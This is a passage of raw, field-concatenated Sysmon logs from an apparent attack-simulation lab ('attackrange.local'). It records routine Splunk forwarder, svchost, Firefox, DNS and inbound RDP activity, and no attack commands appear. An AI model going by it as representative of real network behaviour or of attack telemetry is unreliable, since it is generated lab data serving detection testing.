09:17:55.978{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051732Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:55.978{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051731Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:55.978{5EBD8912-7F2D-614D-0500-00000000FC01}408424C:\Windows\system32\csrss.exe{5EBD8912-8C43-6151-637A-00000000FC01}7084C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001051730Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:55.978{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051729Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:55.978{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051728Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:55.978{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8C43-6151-637A-00000000FC01}7084C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001051727Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:55.964{5EBD8912-8C43-6151-637A-00000000FC01}7084C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001051726Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:55.925{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=41C536C019553AD17B01975427E77CBE,SHA256=148C2AC4081300E81F68B98A1C5AC24EDB0B908DDA477EFBE76197785B4E87CF,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000980078Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:52.871{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59456-false10.0.1.12-8000- 23542300x8000000000000000980077Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:55.249{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4529356AAB7DCA615D29028BAF9257B6,SHA256=62B18384CD98805AB50C6146CB906BB5902BC00CFA97C8E95500C8BAC9AA3E64,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051725Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:55.847{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\datareporting\glean\db\data.safe.binMD5=BF3DD1C43EAB52FD7FF2F96BCEF4A71A,SHA256=311297BBE7EB42965CA6D4F257D24FC8D4DD14C445A597B9BD1EA811C9D0287F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051724Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:55.847{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\datareporting\glean\db\data.safe.binMD5=B5AA4F67E61161F3AEA20D1C781191F2,SHA256=D2999B6DD631DD9102995D8C11586F7D2ECC53D2AE7D254E02087C5D968862DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051723Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:55.846{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\datareporting\glean\db\data.safe.binMD5=8AC8B13A8A0557802B76BB7A60FFB7C8,SHA256=CBC9435554A8FD97EBA899CD58B8E63FCD90008D543864EA382F1F20701EC257,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051722Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:55.845{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\datareporting\glean\db\data.safe.binMD5=FFCA937D30AF302E6A8B6061770AD1F6,SHA256=C263FED5422A0F6E169A042D7685713DC32787107F34B5914E508184097ECD4B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051721Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:55.844{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\datareporting\glean\db\data.safe.binMD5=E9BC642BE72446F65E18A87039A96BA8,SHA256=B40DC1E3CB376E67B6B0DBCE589C3D0F717E69279E6F0840DF53BFD2AA22A267,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051720Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:55.842{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\datareporting\glean\db\data.safe.binMD5=BB3D67C4BC760C7ABC84DBB79031C833,SHA256=58619D645D0FE186215B82F9803DD84A3A2058246F7CB49721CEBA5F580A931E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051719Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:55.694{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=10294AC5EC862AECB11447429BE0EC4B,SHA256=C6A629BA7BD90A0C1E40A6C6ED5A64494273B2170CFA1A08EF6977E31DD0163C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051718Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:55.563{5EBD8912-8C43-6151-627A-00000000FC01}42486688C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001051717Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:55.394{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=AB642DB822007B74B0F94FC59CA3DCE9,SHA256=8829F0774FD6AD837FB1BF7180594C73532DC709CBEB1BC0973A7C39772BFE82,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051716Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:55.394{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=494A4CBF13FD1FD3090D70E8A00CD7B4,SHA256=83DEF08648FD5C2E010BAB4B2A98180B533E50E32668610AC3A2C2BFD9758C3D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051715Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:55.379{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8C43-6151-627A-00000000FC01}4248C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051714Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:55.379{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051713Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:55.379{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051712Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:55.379{5EBD8912-7F2D-614D-0500-00000000FC01}408368C:\Windows\system32\csrss.exe{5EBD8912-8C43-6151-627A-00000000FC01}4248C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001051711Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:55.379{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051710Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:55.379{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051709Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:55.379{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8C43-6151-627A-00000000FC01}4248C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001051708Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:55.364{5EBD8912-8C43-6151-627A-00000000FC01}4248C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000001051707Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:52.764{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53468-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001051740Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:56.977{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=95A6A81373E61853671A15213E96D63A,SHA256=FB36D5496D2ECF2905B287B39FDD0D898D546D8D0233F1B9498D1A1B2A28BC49,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051739Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:56.977{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B5EA512B02854DBBA4B6615864BB4687,SHA256=E3B37029AD225CB8C046E10FD69C170A587D684A8F1763BD84BF17CA5FF1EC50,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980079Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:56.249{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AA162A8B753BEDC4F332B16B3BC73E88,SHA256=A31CADE174FDC105D36DCF00207E81B46F3620DB6047E9839AA0D45CEAC44813,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051738Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:54.306{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-64871-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 354300x80000000000000001051737Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:54.094{5EBD8912-7F30-614D-1400-00000000FC01}1104C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcptruefalse10.0.1.14win-dc-429.attackrange.local53469-false93.184.221.240-80http 354300x80000000000000001051736Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:54.087{5EBD8912-7F40-614D-2F00-00000000FC01}2464C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local59393- 354300x80000000000000001051735Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:54.086{5EBD8912-7F40-614D-2F00-00000000FC01}2464C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local58309- 23542300x80000000000000001051741Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:57.992{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D9160E941921FD50BC229B6B420607DC,SHA256=54BA87326781B4B7ABA08EB6B506FAF5D82DCAD170F00AF22A85DE6F5539FF76,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000980082Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:54.914{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-65323-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000980081Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:57.639{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8D91217F91F8B8BF4A0348B34E4C597B,SHA256=47983B471FCF6B945252945300229B6CAB39EB6F4187AB6945B2FFF503851A62,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980080Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:57.467{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9012AA6509A2E03274A3D9080B831111,SHA256=770B79DE97BC29E5FE7795F15218B009B2BC382274D1FCA1EAD37E2A31CECBE1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980083Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:58.655{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT 